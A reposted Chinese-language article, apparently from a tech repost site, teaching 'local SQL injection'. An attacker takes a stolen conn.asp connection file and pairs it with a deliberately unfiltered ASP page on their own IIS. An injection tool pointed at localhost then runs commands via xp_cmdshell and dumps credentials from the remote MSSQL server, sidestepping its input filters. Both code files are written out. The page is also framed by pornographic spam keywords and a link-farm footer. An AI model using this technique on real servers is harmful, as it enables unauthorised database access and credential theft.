麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 數據庫 > 文庫 > 正文

本地SQL注射攻略分析曝光

2020-10-29 21:55:22
字體:
來源:轉載
供稿:網友

何為本地注射?簡單地講,就是本來你在服務器上無法進行SQL注入,因為服務器上的WEB程序很安全,對request("id")這樣的請求過濾很嚴,或是限制輸入格式為數字等等方法,你只能選擇放棄放棄注入。

但是在有的時候,你可以在本機的IIS里進行注入,從而達到對服務器注射的目的,避過服務器的request參數提交過濾。舉例子來說明吧,現在你誤打誤撞,利用暴庫或是其他的漏洞,得到了服務器的conn.asp文件,那么恭喜你,入侵離成功不遠了。

conn.asp文件代碼一般如下:

<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>

這里面記錄的就是服務器的數據庫的一些信息了,一般也會得到連接密碼,說明是MSSQL的系統,非常好搞。如果服務器有URL可以進行SQL語句注射的話,恢復下XP_CMDshell,我們就能執行很多命令了,DOS命令也隨便你。但是很可惜,我們不能注射,只有這么一個conn.asp文件可以利用。

那么,我們在本機來欺騙服務器,不過你要知道那個服務器采用的是什么web程序,不然你下面就不好寫代碼,我們來寫一個sqltest.asp文件,在其中不做任何過濾,將這個文件和conn.asp一起放到你的IIS中的wwwroot下面,這樣你就能通過Localhost來訪問啦。

sqltest.asp代碼如下:

<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from DVBBSmdb where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>

那個DVBBSmdb是我虛構的,大家要改成這個web程序的數據庫的庫名。看到沒有,id的提交參數沒有經過任何的過濾,沒有用replace或是其他的函數。現在我們在啊D中輸入注射URL:http://localhost/sqltest.asp?id=1。接著用啊D在本地服務器執行命令或是跑用戶名和密碼,就等同于在你要入侵的服務器上進行注射,繞過了它的防注入措施。

這就是本地欺騙注射,明白了吧?

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 中文字幕在线永久视频 | 国产成年人在线观看 | 特级黄毛片 | 黄色大片免费网站 | 国产88久久久国产精品免费二区 | 亚洲国产精品久久久 | 久草在线手机视频 | 国产精品久久久久久久久粉嫩 | 综合日韩欧美 | 成人午夜视频免费看 | 91av在线免费 | 久久国产夫妻视频 | chinese军人gay呻吟 | 永久av在线免费观看 | 国产精品999在线 | 一级在线观看视频 | 精品久久久久久 | 99综合视频 | 沉沦的校花奴性郑依婷c到失禁 | 国产精品成人一区 | 国产午夜精品久久久久久免费视 | 91快色视频| av电影直播 | 粉嫩一区 | 97风流梦电影| 毛片大全在线观看 | 欧美.com| 有兽焉免费动画 | 免费小毛片| 亚洲福利在线视频 | 久久久国产一级片 | 逼片视频 | 免费在线观看亚洲 | 欧美日本国产精品 | 91看片成人 | 色婷婷久久久久久 | 十级毛片 | 巨根插入 | 日本在线视频一区二区三区 | 91成人在线免费观看 | 7777奇米成人四色影视 |